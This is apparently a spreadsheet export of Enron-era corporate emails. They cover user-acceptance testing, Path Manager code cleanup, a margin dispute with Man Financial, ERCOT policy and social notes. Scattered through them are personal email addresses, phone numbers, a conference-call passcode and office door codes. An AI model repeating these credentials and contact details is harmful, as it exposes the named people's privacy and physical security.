Subject:	RE: UAT -- week of 10/22 -- read ASAP_x000D_
_x000D_
These counterparties are not showing up in Enpower testn environment, which is where we are testing drivetrain.  I will enter test deals this morning under regular counterparty names in testn._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rodriguez, Bernice  _x000D_
Sent:	Tuesday, October 23, 2001 2:08 PM_x000D_
To:	Robinson, Rhonda; Nance, Melissa; Pham, Vivien; Richardson, Stacey; Lew, Elsie; Hilliard, Marlene; Denton, Rhonda L.; Robinson, Rhonda; Price, Wade R.; Spears, Christopher; Miroballi, Angelo; Heaney, Gordon; Pinion, Richard; Pham, Vivien; Olvey, David; McDowell, Shirley_x000D_
Subject:	RE: UAT -- week of 10/22 -- read ASAP_x000D_
_x000D_
Hi All,_x000D_
_x000D_
The following have been entered into GCP Test - Devel 2._x000D_
_x000D_
CP# 2133222 2 K Trucking, Inc._x000D_
CP# 2133231 Broadleaft Contracting._x000D_
_x000D_
Please let me know if you need additional address roles, group links or wire information._x000D_
_x000D_
Bernice_x000D_
x37972_x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Device Independent Bitmap) &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Robinson, Rhonda  _x000D_
Sent:	Monday, October 22, 2001 6:45 PM_x000D_
To:	Rodriguez, Bernice_x000D_
Cc:	Lew, Elsie; Pham, Vivien; Nance, Melissa_x000D_
Subject:	FW: UAT -- week of 10/22 -- read ASAP_x000D_
Importance:	High_x000D_
_x000D_
Please contact Elsie Lew, Vivien Pham or I to discuss testing between GCP and Unify. I will be in class on Tuesday morning and Thursday midday. Elsie Lew and Vivien Pham are assisting with testing the replication to Unify-Power. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rhonda _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nance, Melissa  _x000D_
Sent:	Monday, October 22, 2001 2:09 PM_x000D_
To:	Richardson, Stacey; Nance, Melissa; Hilliard, Marlene; Denton, Rhonda L.; Robinson, Rhonda; Price, Wade R.; Spears, Christopher; Miroballi, Angelo; Heaney, Gordon; Pinion, Richard; Lew, Elsie; Rodriguez, Bernice; Pham, Vivien_x000D_
Cc:	Olvey, David; McDowell, Shirley_x000D_
Subject:	UAT -- week of 10/22 -- read ASAP_x000D_
Importance:	High_x000D_
_x000D_
UAT (week of 10/22) is mandatory!  Please supply me with the times/dates you are available to test for the next two weeks, as well as the blackout times ASAP._x000D_
_x000D_
We are in the process of stress testing the system.  To ensure that we are free of errors and duplicate data -- I need new data to be entered into "ALL" scripts this week (preferably Monday thru Wednesday).   I know you are all extremely busy but the data entered prior to noon today cannot be used.  We have resolved a few issues and need new data sent across in order to verify the resolution is complete._x000D_
_x000D_
To prepare you in advance -- I will need you to re-run all test scripts again next week._x000D_
_x000D_
If you have question, concerns or run into any problems -- please call or email me immediately (x54889).  _x000D_
_x000D_
Regards,_x000D_
Melissa_x000D_
(x54889)_x000D_
_x000D_
_x000D_
DON'T FORGET:_x000D_
Ensure that each team is communicating with each other.  The following process must be followed each and every time the test script is executed in order to track test script results:_x000D_
_x000D_
The Result section of all test scripts must be filled out by the Global Users.  _x000D_
Global users will email the completed test scripts to their Unify teammate.  _x000D_
Once the Unify tester has completed verification, he/she will fill in the remainder of the Result information.  _x000D_
After the Unify tester has verified and updated all test scripts, the Unify testers will forward the test scripts, along with all results to me.  _x000D_
_x000D_
For example: When Marlene is finished entering all Global Facilities test scripts -&gt; Chris, Wade and Richard should receive an email containing the test scripts and Result information needed for Unify verification (i.e. Pipeline, rate schedule, deal category, etc).  Richard, Wade and Chris will verify Unify information and fill in additional Result information.  Once that is complete -- I should receive 3 emails (one from each person) containing the test scripts and Result information._x000D_
_x000D_
_x000D_
Also, remember: you do not have to follow the scripts verbatim.  Under the Script Execution section of each script -- Required Actions are mandatory.  However, you can add additional information if you so choose.  The more information -- the better the test.  On the other hand, the Expected Results column may vary per user.  _x000D_
_x000D_
NOTE:  The 18th floor testing lab is available for your use.  Please refer to the email I sent out for lab time availability._x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 10:56:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'everyone.dl-ets@enron.com', 'distribution.dl-ets@enron.com'})</t>
  </si>
  <si>
    <t>ETS IT January Newsletter now available</t>
  </si>
  <si>
    <t>Please visit our January edition of the ETS IT newsletter at:_x000D_
http://www.ets.enron.com/ITNewsletter/</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2000 19:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lizstock@customized.ab.ca'})</t>
  </si>
  <si>
    <t>frozenset({'alkeo@hotmail.com', 'rulrich@shl.com', 'stewart4c@hotmail.com', 'birdz@telusplanet.net', 'vibergd@cadvision.com', 'jimmurphy@remax-professional.com', 'bergmann@telusplanet.net', 'mfazil@globalsec.com', 'gary.goetsch@shaw.ca', 'william_tribe@ca.ml.com', 'lcurrie@arcfinancial.com', 'maggie_timmins@cdnoxy.com', 's.goritz@home.com', 'sheila_kelly@cdnoxy.com', 'gabriel.ollivier@canada.com', 'patricia_szmolyan@scotia-mcleod.com', 'macor@cibc.ca', 'bishop06@cn.ca', 'barbrichardson@metronet.ca', 'lcurry@kineticres.com', 'afowler@arcfinancial.com', 'dfreel@arcfinancial.com', 'sainasm@cadvision.com', 'jmuraro@tornado.ab.ca', 'bill_ketcheson@pcp.ca', 'dave@rpcl.com', 'bboulang@arcfinancial.com', 'kelly_trout@scotia-mcleod.com', 'bpoff@home.com', 'michael_leahy@scotia-mcleod.com', 'brianp.jennings@cadvision.com', 'jgm@abfg.com', 'grandanj@home.com', 'saxbyd@tcel.com', 'davisc@bennettjones.ca', 'phbrn@ibm.net', 'gaulp@cadvision.com', 'john.lavorato@enron.com', 'dbonner@arcfinancial.com', 'dlward@telusplanet.net', 'abradford@petersco.com', 'micheline@cadvision.com', 'rpm@merchant.ca', 'milan_cacic@ca.ml.com'})</t>
  </si>
  <si>
    <t>slient auction prize update -- please read all of this message</t>
  </si>
  <si>
    <t>Dear Deputy:_x000D_
_x000D_
Jim Murphy has asked me to pass on some exciting news about the silent _x000D_
auction prizes:_x000D_
_x000D_
The Medieval dinner/murder mystery prize is now complete.  As you will _x000D_
recall, this prize for twelve people is a gourmet dinner and murder mystery, _x000D_
with full medieval costumes provided.  The Palliser Hotel has now kindly _x000D_
donated 6 hotel rooms for our diners to retire to and Sunday brunch for _x000D_
twelve the next morning, to complete the prize,_x000D_
_x000D_
Jim tells me he is inches away from clinching the NBA package.  You will _x000D_
recall that he has 10 Grizzly tickets, accomodation for 10 in Vancouver and  _x000D_
he has ALMOST secured 10 tickets on WestJet.  Micheline Maes is working on _x000D_
this with Jim and they hope to get confirmation that the airline tickets will _x000D_
be donated soon.  I will keep you posted.  If you can help us to get these _x000D_
tickets, please call Jim._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Also, the Sunshine Village prize (4 people get a limo ride to Sunshine, lift _x000D_
tickets, ski rentals and 3 days/3 nights at the Sunshine Village Inn, _x000D_
including food -- must be taken in February or April, 2000) is complete._x000D_
_x000D_
And, the Moondance Guest Ranch prize (4 people get a limo ride to the Guest _x000D_
Ranch, 5 nights, 5 days at the Ranch, food, horses, and other amenities and _x000D_
lodgin) is complete._x000D_
_x000D_
Tell your friends who will be attending the party, so they will be ready to _x000D_
bid BIG $$$ on these prizes!!_x000D_
_x000D_
Good work Jim!_x000D_
_x000D_
Liz_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - att1.htm_x000D_
 - att2.bmp</t>
  </si>
  <si>
    <t>Thu, 23 Dec 1999 13:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sgilles@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'chris.germany@enron.com', 'scott.neal@enron.com'})</t>
  </si>
  <si>
    <t>Dayton Estimate of Capacity for January</t>
  </si>
  <si>
    <t>Scott, Chris and Dan,_x000D_
_x000D_
Attached you will find the contract minimum for Dayton capacity for January._x000D_
_x000D_
We did not have a basis trader over here so I had to guess at the numbers for_x000D_
Jan.  You will see those listed in Red._x000D_
_x000D_
I'll update ASAP on Monday after visiting with Dayton and our trading staff._x000D_
_x000D_
sg_x000D_
_x000D_
_x000D_
 - DPLcapacitybymonth.xls</t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 07:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Shaffer option</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the form of option agreement for the Schaeffer option which _x000D_
passes muster.  The changes are relatively minor, but have significance from _x000D_
an accounting and legal perspective._x000D_
_x000D_
_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 12:35:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.pinion@enron.com'})</t>
  </si>
  <si>
    <t>RE: Path Manager Rewrite / Optimization project</t>
  </si>
  <si>
    <t xml:space="preserve">Following are my comments.  The managers cc'd might have some additional th=_x000D_
oughts._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Pena, Matt =20_x000D_
Sent:=09Monday, October 08, 2001 4:26 PM_x000D_
To:=09Pinion, Richard; Jaquet, Tammy; Superty, Robert; Pena, Matt_x000D_
Cc:=09Warner  , John ; Ripley, Brian; D'Souza, Romeo; Rao, Ramesh_x000D_
Subject:=09Path Manager Rewrite / Optimization project_x000D_
Importance:=09High_x000D_
_x000D_
All:_x000D_
_x000D_
We're currently identifying processes that are inefficient and could possib=_x000D_
ly benefit from being rewritten or not even performed.  Going foward, I wou=_x000D_
ld like Bob to appoint a lead business person to whom we could ask question=_x000D_
s and or suggest ideas to so that they could in turn validate this informat=_x000D_
ion with the desk managers/schedulers.  We had this approach with Nomlogic =_x000D_
and having Clarissa work the issues worked quite nicely.  Who ever you choo=_x000D_
se, we would need about 15% of their time for now.  Later on, with coordina=_x000D_
tion efforts and testing, it may go up to 75%.  I don't see that happening =_x000D_
for a while though._x000D_
_x000D_
The sooner we get someone to devote to this, the better off we will be.  I =_x000D_
expect these changes that we'll be looking into should improve performance =_x000D_
quite a bit. =20_x000D_
_x000D_
That being said, we've identified three items that would speed up processin=_x000D_
g the retrieval of Path Manager. =20_x000D_
_x000D_
1)  Currently, the Path Manager attempts to reuse Path Ids.  I can't think =_x000D_
of any reason why we need to perform this extra step?    It runs through th=_x000D_
is processing on the application and generally doesn't find a match.  I kno=_x000D_
w Patti has mentioned this several times and I can't think of a valid reaso=_x000D_
n for performing this work.  I talked with Dave Nommensen, and according to=_x000D_
 him, what used to happen is that sometimes schedulers would get duplicate =_x000D_
paths out there which is why they put this code in place???  From a schedul=_x000D_
ing perspective, my understanding of what your main concern is to just main=_x000D_
tain your position and be able to change it.  If you were overpathed, you'd=_x000D_
 see it in the Path Manager either way. [Pinion, Richard]    To restate the=_x000D_
 question for clarity, in path manager a scheduler pulls down a supply, mar=_x000D_
ket and a service, adds any up/downstream contract information and/or Duns =_x000D_
or DRN override and then saves it.  Unify looks for an old path with those =_x000D_
exact variables and if it finds it re-uses it and if it does not find an ex=_x000D_
act match creates a new path and path id.  I had been told that to do away =_x000D_
with this function would create an unacceptably high amount of paths since =_x000D_
any path once nominated on could not be deleted.  Has this changed???  At o=_x000D_
ne time there were some schedulers that looked for the same path / activity=_x000D_
 number match for nominations.  Texas Eastern was the only pipeline that ne=_x000D_
eded the old activity numbers no matter how long it had been since they wer=_x000D_
e used.  I spoke with Chris Ordway and the new LINK system no longer needs =_x000D_
this to occur.  Transco uses activity numbers but uses the Activity number =_x000D_
cross reference table to that function and therefore should not be affected=_x000D_
.  Therefore, if it does not create a space or memory problem for Unify, I =_x000D_
don't think that this constant old path look up is needed. =20_x000D_
_x000D_
2)  The scheduling position window:  does anyone use this?  If not, we'll r=_x000D_
emove the code logic that populates this window.  I have never seen a sched=_x000D_
uler use this.  Please verify. [Pinion, Richard]   Originally such a window=_x000D_
 was in use by everyone in the legacy system "Autonoms" so it was duplicate=_x000D_
d in Unify by request.  It is not used in Unify now because of the other so=_x000D_
phisticated tools Unify provides which obviate it's use.  The only value wo=_x000D_
uld be notification of bridge errors or contract imbalances but there are o=_x000D_
ther ways to determine those problems.  As voted on in a previous meeting o=_x000D_
f the managers - Lose it!=20_x000D_
_x000D_
3)  On the inventory pool list, does anyone need to see the Contarct Refere=_x000D_
nces List?  Again, this code is called every retrieval time and doesn't app=_x000D_
ear to be used from my observations.   If they do need this information, we=_x000D_
 could provide it, but if not, I'd prefer to remove the functionality. [Pin=_x000D_
ion, Richard]    This function is still very much in use by those with poin=_x000D_
t based pipelines that must use the imbalance pool to facilitate balancing =_x000D_
nomination volumes where multiple pipeline external pools exist and are pat=_x000D_
hed through the same contract imbalance pool.  Keep it!=20_x000D_
_x000D_
4)  When pathing a one to many or many to one set of paths, what's the aver=_x000D_
age number of paths they create at one time?  What about updates?  I know t=_x000D_
hat ANR and NIGAS are big users of this feature since they have small packa=_x000D_
ges of gas that they are limited in size to.  Does the system seem faster w=_x000D_
hen you update one record at a time or chunks of records?  My real question=_x000D_
 is how often they do this and for what number of paths on both Updates and=_x000D_
 Inserts.  By update, I mean, going to the path list and changing an upstre=_x000D_
am / downstream contract or a PSNA which in turn forces a new path to be cr=_x000D_
eated. [Pinion, Richard]    This one to many or many to one pathing goes on=_x000D_
 every day on every pipeline.  There is no 'average'.  They typically updat=_x000D_
e a path with up/downstream meters or duns or dnb numbers one at a time how=_x000D_
ever.  I hope this answers your question.  I see no change to this process =_x000D_
at this time=20_x000D_
_x000D_
5)  On brokered paths, do you want to utilize the same logic we have for Se=_x000D_
rvice?  In other words, when updating Brokered arrangements, we don't incor=_x000D_
porate the same logic for zeroing out the path and recreating a new arrangm=_x000D_
ent link and hence sending it to be renominated?  Why do we do this for ser=_x000D_
vice?  Is it because we have to renominate it?  I assume that's what it's f=_x000D_
or since we don't send brokered paths to the pipe.  Anyway, with the Nomlog=_x000D_
ic implmentation (two way interface), we were planning on having it behave =_x000D_
the same way as service.  We need this verified. [Pinion, Richard]    We do=_x000D_
n't perform the same logic for Brokered paths because these are not nominat=_x000D_
ed to the pipeline and hence do not need a zero path to be resent to the pi=_x000D_
peline when a significant change is made to the already nominated path.  I =_x000D_
don't see a need to change the way Brokered paths are behaving at this time=_x000D_
._x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 09:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian_rudis@aimfunds.com'})</t>
  </si>
  <si>
    <t>RE: Remember Me...</t>
  </si>
  <si>
    <t>Hey Brian!  Good to hear from you - we are just sitting here watching our stock get killed AGAIN!!  Thanks for the pep talk last week - I certainly needed it.  Let me know next time you guys are out - maybe I can join in the fun!_x000D_
_x000D_
Take care,_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Rudis, Brian D" &lt;Brian_Rudis@AIMFUNDS.COM&gt;@ENRON  _x000D_
Sent:	Tuesday, November 06, 2001 1:51 PM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	Remember Me..._x000D_
_x000D_
Hey Kim,_x000D_
_x000D_
This is Elizabeth's friend from last Thursday.  I went out of town and this_x000D_
is my first chance to say HI.  Had a good time the other night.  We should_x000D_
all go have drinks again soon.  I hope your not AS down in the dumps.  Life_x000D_
is too short for that.  Anyway, it was great meeting you.  Take Care._x000D_
_x000D_
Brian Rudis_x000D_
Strategic Sales Director_x000D_
800-337-4246 ext. 4787_x000D_
www.aimfunds.com</t>
  </si>
  <si>
    <t>Mon, 24 Sep 2001 06:27:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Liquids Trade Track Books Created- Request # 902</t>
  </si>
  <si>
    <t xml:space="preserve">This book request has been completed. Please call me if you have any questions._x000D_
_x000D_
Thank you._x000D_
_x000D_
Jennifer Velasco_x000D_
Risk Controls_x000D_
X 5-2526_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 08:27:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'custserv@iso-ne.com'})</t>
  </si>
  <si>
    <t>frozenset({'newssubs@iso-ne.com'})</t>
  </si>
  <si>
    <t>ISO News -- Issue 79</t>
  </si>
  <si>
    <t>ISO News -- Issue 79_x000D_
_x000D_
Feature Stories:_x000D_
   Northeast Electric Infrastructure Security and Reliability Forum_x000D_
   On-line Data Requires Careful Review_x000D_
   Standard Market Design (SMD) Training Materials on the Web_x000D_
   Registration for SMD Training Sessions Opens_x000D_
_x000D_
Dispatches:_x000D_
   E-Tag 1.7 Workshops February 28, 2002 or March 1, 2002_x000D_
_x000D_
Please browse to:_x000D_
   http://www.iso-ne.com/Customer_Newsletters/Issue_79_Jan_25_2002.pdf</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 05:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>iso conf call</t>
  </si>
  <si>
    <t>locational market power mitigation   877-670-4111_x000D_
passcode 589314</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 07:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Stinson Gibner &amp; Hector Campos</t>
  </si>
  <si>
    <t xml:space="preserve">Rob,_x000D_
_x000D_
Thanks. We are always glad to help you._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rob Bradley@ENRON_x000D_
09/28/2000 05:34 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Stinson Gibner/HOU/ECT@ECT, Hector Campos/HOU/ECT@ECT _x000D_
Subject: Stinson Gibner &amp; Hector Campos_x000D_
_x000D_
Ken Lay gave a high profile presentation on the current natural gas supply _x000D_
and price situation at a recent conference held by the Interstate Oil and Gas _x000D_
Compact Commission, and some of the best graphs came from work that Stinson _x000D_
and Hector did (see the attached, slides #11, #12, #14, &amp; #15)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I really appreciate their research and hope to be able to use their talents _x000D_
again for presentations for the Office of the Chairman.._x000D_
_x000D_
- Rob_x000D_
_x000D_
Robert L. Bradley Jr._x000D_
Director, Public Policy Analysis_x000D_
Enron Corp._x000D_
P.O Box 1188, Room 4724a_x000D_
[1400 Smith Street 77002]_x000D_
Houston, Texas 77251-1188_x000D_
_x000D_
(P) 713-853-3062_x000D_
(F) 713-646-4702_x000D_
_x000D_
Assistant: Joan Stransky 713-853-4702_x000D_
jstrans@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 10:01:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Man Financial:  margin calculation</t>
  </si>
  <si>
    <t>ENA received a letter 10/30/01 stating that Man would begin margining on a risk-weighted basis rather than using the NYMEX SPAN calculation.  This is prohibited under our futures agreement.  Man has not formally called for additional margin (which they have the right to do) but rather is withholding about $25M based upon a misunderstanding between traders about moving option positions (I'm not entirely clear about the circumstances).  Man has never claimed that the $25M was "additional margin".  ENA faxed a letter this morning to Man demanding the return of margin in excess of the SPAN calculation, basically a response to the letter._x000D_
_x000D_
ENA acounting does not have the software to execute SPAN calculations.  A recommendation to purchase the software was made by Sarah Wesner (who then reported to Joe Deffner) to accounting last year. _x000D_
_x000D_
I understand that John Arnold intends to move most positions (including options) from Man to Paribas.  However, this information changes frequently._x000D_
_x000D_
Joe Deffner signed the letter and a copy was delivered to Louise Kitchen.  Let me know if you need further information._x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 09:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'osman.sezgen@enron.com', 'john.woodman@enron.com', 'aandy.ly@enron.com', 'michael.danielson@enron.com', 'cary.fukada@enron.com', 'douglas.condon@enron.com', 'jennifer.lind@enron.com', 'samuel.wehn@enron.com', 'ibrahim.qureishi@enron.com', 'steve.kromer@enron.com', 'gray.calvert@enron.com', 'mona.petrochko@enron.com', 'cristina.zavala@enron.com', 'susan.mara@enron.com', 'joseph.alamo@enron.com', 'mary.schoen@enron.com', 'derek.kelly@enron.com', 'edith.turnipseed@enron.com', 'mark.fillinger@enron.com', 'octavio.carranza@enron.com', 'ronald.mentan@enron.com', 'michael.wong@enron.com', 'ryan.deane@enron.com', 'scott.healy@enron.com', 'catherine.mckalip-thompson@enron.com', 'dean.russell@enron.com', 'victor.browner@enron.com', 'david.parquet@enron.com', 'rob.bakondy@enron.com', 'nicole.lauzier@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'vicky.ha@enron.com', 'martin.wenzel@enron.com', 'kelly.brodbeck@enron.com', 'laird.dyer@enron.com', "aida.o'neal@enron.com", 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>New Door Code</t>
  </si>
  <si>
    <t>Hey Everyone-_x000D_
We have a new door code.  _x000D_
Just wanted to keep you on your toes.  _x000D_
_x000D_
New front and _x000D_
back door code:  _x000D_
474E_x000D_
_x000D_
New side door code _x000D_
(from women's restroom):_x000D_
474E456E</t>
  </si>
  <si>
    <t>Mon, 6 Mar 2000 02:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2000 Analyst cont'd</t>
  </si>
  <si>
    <t xml:space="preserve">Here sis part 2 of Skillings presentation._x000D_
Ben_x000D_
---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 03/06/2000 _x000D_
10:08 AM ---------------------------_x000D_
_x000D_
_x000D_
Jason R Wiesepape_x000D_
02/03/2000 10:32 AM_x000D_
To: Benjamin Rogers/HOU/ECT@ECT, Michael Danielson/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 2000 Analyst cont'd_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jason R Wiesepape/HOU/ECT on 02/03/2000 _x000D_
10:31 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Michael B Rosen                           02/03/2000 10:16 AM_x000D_
	_x000D_
_x000D_
To: Jason R Wiesepape/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 2000 Analyst cont'd_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 07:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nicole.hunter@enron.com'})</t>
  </si>
  <si>
    <t>Storm Mountain still in work queue</t>
  </si>
  <si>
    <t xml:space="preserve">Tana-_x000D_
_x000D_
Storm Mountain looks great for the Clickpaper approvals.  You may want to go _x000D_
in and touch the remaining product types for that counterparty just to get it _x000D_
out of your work queue._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Nikki_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 08:23:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'e.sullo@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'david.gorte@enron.com', 's..bradford@enron.com', 'ted.murphy@enron.com', 'rick.buy@enron.com', 'donna.lowry@enron.com', 'l..carson@enron.com', 'david.port@enron.com'})</t>
  </si>
  <si>
    <t>Emergency Contact Procedures</t>
  </si>
  <si>
    <t>Per Rick Buy's request, we are developing procedures so that the head of each RAC department will have a current list of emergency contact numbers for all RAC employees.  I have outlined the plan below:_x000D_
_x000D_
The Assistant in each group will be responsible for updating home telephone numbers, cellular phone numbers and home addresses for each member of their group.  Rita Hennessy will consolidate the list for all of RAC on a monthly basis._x000D_
The monthly update will be emailed to the personal email address of each department head or their designee.  This update should be stored on a personal computer until the next monthly update is received._x000D_
Two hard-copies of the monthly update will be maintained in a file at the home of Rick Carson and at the home of Sharon Sullo._x000D_
_x000D_
If this plan is acceptable to you, please let me know the personal email address to use.  Please call me with comments or questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sharon _x000D_
x31946</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 11:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tentative - telephonic Board Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Barbara -_x000D_
_x000D_
Ken said that he will be on the plane, so unable to participate in the call._x000D_
_x000D_
Thanks._x000D_
_x000D_
Rosie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Sain, Barbara" &lt;Barbara.Sain@COMPAQ.com&gt; on 04/12/2001 02:11:18 PM_x000D_
To: "'babbio@verizon.com'" &lt;babbio@verizon.com&gt;, "'lynnj@iname.com'" _x000D_
&lt;lynnj@iname.com&gt;, "'tedenloe@msn.com'" &lt;tedenloe@msn.com&gt;, _x000D_
"'ghh@telcordia.com'" &lt;ghh@telcordia.com&gt;, "'kenneth.lay@enron.com'" _x000D_
&lt;kenneth.lay@enron.com&gt;, "'sandy.litvack@disney.com'" _x000D_
&lt;sandy.litvack@disney.com&gt;, "'kjewett@kpcb.com'" &lt;kjewett@kpcb.com&gt;, _x000D_
"'ken.roman@verizon.net'" &lt;ken.roman@verizon.net&gt;, "'lsalhany@lifefx.com'" _x000D_
&lt;lsalhany@lifefx.com&gt;, "Capellas, Michael D." &lt;Michael.Capellas@COMPAQ.com&gt;_x000D_
cc: "'vthwreatt@lifefx.com'" &lt;vthwreatt@lifefx.com&gt;, _x000D_
"'colleen.king@disney.com'" &lt;colleen.king@disney.com&gt;, _x000D_
"'rosalee.fleming@enron.com'" &lt;rosalee.fleming@enron.com&gt;, _x000D_
"'tori.wells@enron.com'" &lt;tori.wells@enron.com&gt;, "'kliva@telcordia.com'" _x000D_
&lt;kliva@telcordia.com&gt;, "'jameyer@airmail.net'" &lt;jameyer@airmail.net&gt;, _x000D_
"'lois.m.rigby@verizon.com'" &lt;lois.m.rigby@verizon.com&gt;, "Auwers, Linda" _x000D_
&lt;Linda.Auwers@COMPAQ.com&gt;, "Siekman, Tom" &lt;Tom.Siekman@COMPAQ.com&gt;, "Ambriz, _x000D_
Annette" &lt;Annette.Ambriz@COMPAQ.com&gt;, "Rohde, Lisa" &lt;Lisa.Rohde@COMPAQ.com&gt;, _x000D_
"Trent, Grace" &lt;Grace.Trent@COMPAQ.com&gt; _x000D_
Subject: Tentative - telephonic Board Meeting_x000D_
_x000D_
_x000D_
Please mark your calendar for a tentative telephonic Board meeting on_x000D_
Tuesday, April 17_x000D_
from 1:00 - 2:00 p. CDT (Houston time).  I will contact you Monday to_x000D_
confirm the telephonic meeting and to also give you call-in instructions if_x000D_
applicable._x000D_
_x000D_
Thanks._x000D_
_x000D_
Barbara Sain_x000D_
Law Department_x000D_
(p) 281-514-6021_x000D_
(f) 281-518-6807_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 10:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Enron's recent filing at ERCOT</t>
  </si>
  <si>
    <t xml:space="preserve">Admittedly , ERCOT was handled poorly from a pleading submission perspective, _x000D_
but there is a legitimate discussion going on within the company that , at _x000D_
the very least,  will result in a more flexible approach to market structure _x000D_
and , perhaps( this is my preference) will result in a sharpening and _x000D_
refocusing of our positions that will acknowledge the necessity for an _x000D_
"LMP"-like approach in real-time to achieve sufficient depth of liquidity.( _x000D_
with a keen focus on developing forward markets in transmission rights).  _x000D_
Airing our differences and doubts externally creates absolutely no benefit - _x000D_
At the end of the day, we're here ( no matter where we end up on this issue) _x000D_
to enhance the company's commercial success, not to win an ideological _x000D_
battle. I understand and value the passion people in our group bring to their _x000D_
work... I don't want to lose that "fire", but merely want to assure that it _x000D_
is properly directed. We will resolve this issue shortly and am quite  sure _x000D_
we will all work hard to ensure uniformity of message at that time._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan J Mara_x000D_
02/21/2001 06:15 PM_x000D_
To: "Alaywan, Ziad" &lt;ZAlaywan@caiso.com&gt;_x000D_
cc: eschmid@caiso.com, dhawk@caiso.com, alexp@eccointl.com, _x000D_
harry.singh@neg.pge.com (bcc: Richard Shapiro/NA/Enron)_x000D_
_x000D_
Subject: Re: FW: Enron's recent filing at ERCOT  _x000D_
_x000D_
Ziad   and Elena and Diane and Alex,_x000D_
_x000D_
It is not exactly true -- but I can see how people got that idea.  Enron has _x000D_
decided to withdraw the filings we made in ERCOT. Our position on the ERCOT _x000D_
market structure is being reviewed.  _x000D_
_x000D_
Enron continually goes through a process of reviewing its policies to make _x000D_
sure they are consistent with our business needs.  I can tell you that there _x000D_
are some strong supporters of Hogan's policies INSIDE Enron now and these _x000D_
supporters are finding an ear.  _x000D_
_x000D_
Currently, we are reviewing the positions we are taking on market structure _x000D_
in ERCOT and the east.  We have to ensure we are practical -- from a business _x000D_
point of view -- and not being just religious about our views.  Probably the _x000D_
number one concern of the business people is the ability to have a deep, _x000D_
liquid market for trading.  I believe that much of the discussion has focused _x000D_
on the ways in which we can achieve such a market.  _x000D_
_x000D_
After our review of ERCOT, Enron may indeed support a PJM-like structure for _x000D_
the real-time market, but the filings we make will likely not imply that this _x000D_
approach be implemented everywhere.  I expect that we will be free to support _x000D_
different approaches in different parts of the country, depending on the _x000D_
evolution of the markets in each location._x000D_
_x000D_
What does this mean for our position in California?  So far, nothing.  We are _x000D_
standing firm on our California position, supporting the ISO and _x000D_
stakeholder-approved approach for congestion management, and do not have any _x000D_
plans to make new proposals. Further, we have the support of the Traders on _x000D_
this._x000D_
_x000D_
